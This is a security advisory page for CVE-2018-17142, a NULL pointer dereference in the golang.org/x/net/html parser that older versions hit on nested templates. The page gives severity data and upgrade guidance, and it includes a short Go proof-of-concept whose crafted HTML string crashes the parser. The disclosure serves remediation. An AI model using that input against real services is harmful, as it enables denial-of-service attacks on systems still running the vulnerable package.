NULL Pointer Dereference Affecting golang.org/x/net/html package, versions <0.0.0-20180925071336-cf3bd585ca2a


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.21% (59th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about NULL Pointer Dereference vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-GOLANG-GOLANGORGXNETHTML-3314985
  • published8 Feb 2023
  • disclosed13 May 2022
  • creditUnknown

Introduced: 13 May 2022

CVE-2018-17142  (opens in a new tab)
CWE-476  (opens in a new tab)

How to fix?

Upgrade golang.org/x/net/html to version 0.0.0-20180925071336-cf3bd585ca2a or higher.

Overview

golang.org/x/net/html is a package that implements an HTML5-compliant tokenizer and parser.

Affected versions of this package are vulnerable to NULL Pointer Dereference in parse.go, which mishandles nested templates when parsing. Certain invalid inputs can cause a panic and crash.

PoC

package main
import (
    "strings"
    "golang.org/x/net/html"
)

func main() {
    r := strings.NewReader("<math><template><mo><template>")
    html.Parse(r)
}

CVSS Scores

version 3.1